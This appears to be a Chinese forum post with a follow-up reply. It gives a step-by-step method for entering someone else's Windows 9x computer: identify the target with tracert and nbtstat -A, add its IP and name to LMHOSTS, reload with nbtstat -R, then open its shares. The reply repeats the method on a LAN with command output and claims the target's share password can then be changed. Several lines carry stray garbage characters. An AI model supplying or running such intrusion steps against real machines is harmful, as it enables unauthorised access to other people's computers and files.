WIN9X下的入侵方法

寒飞雪

下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。 以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

我这里是用局域网进行测试，所以没用上tracert。
本机ＩＰ：192.168.1.12
" L/ I. R6 M/ u0 K# O试验机： 192.168.1.5
: j  u4 \% b0 Y( o7 J１。用nbtstat -a 192.168.1.5时有：
C:\WINDOWS>nbtstat -a 192.168.1.5
& p4 n: ^; h7 J# U4 n+ v0 ]NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
LYWS8 <00> UNIQUE Registered
9 r1 n( @# W, q# c- E5 X  T- eLEDYOUNG <00> GROUP Registered
3 ?: u% V: x* e# n9 A$ nLYWS8 <03> UNIQUE Registered
7 d6 k2 \, J* g( \: N) zLYWS8 <20> UNIQUE Registered
' o0 V% X  O2 Z; ?6 uLEDYOUNG <1E> GROUP Registered
CY <03> UNIQUE Registered
MAC Address = 00-80-C8-E7-67-D3
. r# `# \* Y( `8 Q/ {  K由此可知此机计算机名为LYWS8
8 @: `+ |* U8 `( _* x$ f２。将c:\windows\lmhosts.sam 改名为lmhosts.old，然后用copy命令建立lmhosts.sam：
ren lmhosts.sam lmhosts.old
; |" ~! `2 `: E& x- i" j$ v) ycopy con lmhosts.sam
lmhosts.sam内容为：
192.168.1.5 LYWS8
３。输入nbtstat -r时有：
C:\WINDOWS>nbtstat -r
NetBIOS Names Resolution and Registration Statistics
----------------------------------------------------
Resolved By Broadcast = 5
: j7 ]# E' H  g* {Resolved By Name Server = 0
Registered By Broadcast = 6
1 i2 p* h" w, _$ eRegistered By Name Server = 0
NetBIOS Names Resolved By Broadcast
! H& k2 F6 [* _---------------------------------------------
LEDYOUNG <1B>
LYWS8
LEDYOUNG <1B>
LYNTSRV
LEDYOUNG <1C>
４。点‘开始’－‘查找’－‘计算机’，输入　LYWS8
５。在列表中双击此计算机，弹出一设置共享时的密码输入确认框（此机本来已设置成密码访问的共享形式），可以改共享密码和共享方式
６。改了共享密码和方式后当然可以自由进出了